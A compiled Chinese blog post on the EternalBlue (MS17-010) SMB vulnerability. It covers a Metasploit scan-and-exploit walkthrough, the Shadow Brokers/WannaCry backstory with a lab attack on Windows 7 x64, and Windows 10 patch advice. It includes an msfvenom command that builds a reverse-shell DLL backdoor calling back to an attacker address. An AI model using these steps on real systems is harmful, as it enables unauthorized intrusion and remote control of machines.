ms17-010 win10(永恒之蓝的漏洞)

一、Metasploit-ms17-010 永恒之蓝 | 2019-03-29

永恒之蓝是去年玩剩下的了，记得当初刚刚泄露的时候，用的是 NSA那个 fb.py脚本去复现漏洞的。现在 Metasploit里面已经集成了 17-010漏洞，渗透测试更加方便与正式化，内网中用 17-010去测一测会发现意外惊喜哦。

起初在 Docker环境下最后执行 exploit的时候总是拿不到 sessions，换了很多系统失败了很多次。后来果断感觉是 Docker环境的问题，于是用虚拟机下的 Kali测试，最后测试成功~~~~~所以测试的时候尽量少用 Docker环境下的 Kali来监听反弹的 sessions哦~~后来给幸安哥描述了这个情况，得到答复是 docker做这个反弹 shell监听得把 445端口映射出来才可以~~涨姿势了。关于端口映射后面会单独写文章来介绍，关于 msf一些高级用法本打算写在这篇文章里面的，后来发现有的冗余了，准备另开文章来写。

其中前 2个插件是 auxiliary目录下的，属于辅助验证程序。

3和 4是 exploit目录下的，这才是我们重点研究的对象~

这里就拿 auxiliary/scanner/smb/smb_ms17_010这个扫描插件来测试，这个插件的作用是扫描可能含有 ms17-010漏洞的服务器。

这里的 show options是显示这个插件相关的一些参数，在 Required这一栏下面是 yes的表示必填参数，这里面还剩 RHOSTS这个参数没有填写即目标网段。下面设置一个目标网段，准备进行扫描测试：

设置扫描线程，插件默认是 1，这里设置为 50：

可以执行 show options查看自己刚刚填写的参数信息：

或者

可以看到扫描出很多含有漏洞的主机了：

exploit成功~~

失败~~

这里我随便测试了没有成功，可能是这里我测试的 win7版本有点不一样，和官方介绍的所有版本略微有点不一样~~不过在测试 Server 08 R2版本的时候执行效率很高，可以很快拿到反弹的 shell。所以具体改良了哪些建议实际动手去测试一番。

kali操作机器的 ip地址是： 10.101.177.185，将 shell会话转到 kali的 6666端口上。

然后 msf就开始监听本机的 666的端口了。

这个时候在 windows下点击之前生成的 shell.exe,msf这里会劫持到会话。

Linux下面汉字默认是 UTF-8编码

Windows下汉字使用的是 GBK系列编码

Kali下先勾选 GBK编码

msf乱码

msf汉字正常

二、ms17-010:利用“永恒之蓝”攻陷一台计算机

我估摸着这两天大家都应该被一款老旧的勒索病毒刷爆了朋友圈，可能还有些同学不幸中招，那么是什么原因导致了这款勒索病毒如此猖狂？

这件事情还得从一个黑客组织说起，这个组织叫做Equation Group（方程式组织），这一黑客团伙与美国国家安全局（NSA）的关系一直十分密切。而且外界也普遍认为，Equation Group是美国国家安全局的一个下属部门。很多安全研究专家表示，Equation Group这一黑客组织所拥有的技术无论是从复杂程度还是从其先进程度来看，都已经超越了目前绝大多数的黑客团体，而且该黑客组织已经活跃了二十多年了。

然而，这个黑客组织被另一黑客团伙“The Shadow Brokers”（影子经纪人）给入侵了……(就是这么任性)。“The Shadow Brokers”（影子经纪人）自称他们从Equation Group手里拿到了很大一部分黑客工具，决定公开叫卖。

本以为能狠赚一笔，但实际上却没有人鸟他们，就是这么神奇。于是The Shadow Brokers决定公开一部分有价值的工具，其中“eternalblue”（永恒之蓝）就是其中之一（漏洞编号ms17-010）。那么永恒之蓝这个漏洞利用程序究竟牛X到什么地步呢？这么说吧，除了windows 10以外，windows系列的系统无一能够幸免。

于是乎，永恒之蓝漏洞利用程序+wannacry勒索软件程序造就了迄今为止最巨大的勒索交费活动，影响到近百个国家上千家企业及公共组织。

接下来，满足小白的好奇心，一起探究The Shadow Brokers公布的永恒之蓝漏洞利用程序，如何利用ms17-010攻陷一台64位windows 7。

攻击机1(192.168.1.101)：

装有metasploit的linux

攻击机2(192.168.1.137)：

可以运行The Shadow Brokers工具箱的windows xp->python2.6+ PyWin32 v2.12

靶机(192.168.1.140)：

windows 7 x64（开放139、445端口）

利用The Shadow Brokers工具箱中的永恒之蓝利用程序攻陷靶机

修改后的路径与目录当前的路径一致

一路回车，直到输入项目名称处，输入项目名称

继续回车

继续一路回车，直到选择模式选择1

继续一路回车，直至攻击完成

相关命令：

msfvenom-p windows/x64/meterpreter/reverse_tcp-a x64 lhost=192.168.1.101 lport=4444-f dll-o./backdoor.dll

一路回车，直到选择系统架构，由于我们要攻击的主机是win 7 x64位，故这里选择1

选择2 dll注入

Ps：喜欢的留个赞b(￣▽￣)d~也可以关注专题：黑客师。

三、win10中了勒索病毒怎么办

勒索病毒WannaCry主要是利用利用NSA（National Security Agency，美国国家安全局）泄露的危险漏洞“EternalBlue”（永恒之蓝）进行传播，微软早前发布了MS17-010漏洞补丁进行修复，不过很多用户并没有及时更新补丁，以至于大量电脑被勒索病毒攻击，受波及最小的是Windows10系统，因为Windows10 1703最新版早就集成了漏洞补丁，对勒索病毒完全免疫，但是不是说win10百分百不被勒索攻击，win10版本非常多，旧版本依然会被病毒感染。

微软强调，Windows 10用户不是此次恶意软件攻击的目标，不过根据微软安全公告，只有最新的Windows 10 1703 Creators Update创意者更新才完全不存在此次攻击利用的漏洞，此前的Windows 10 RTM原始版、1511十一月更新版、1607周年更新版依然需要打补丁，如果没有更新补丁的win10依然会被勒索病毒攻击，所以大家一定要注意及时更新漏洞补丁，win10点击开始--设置--更新和安全--Windows更新，执行系统更新。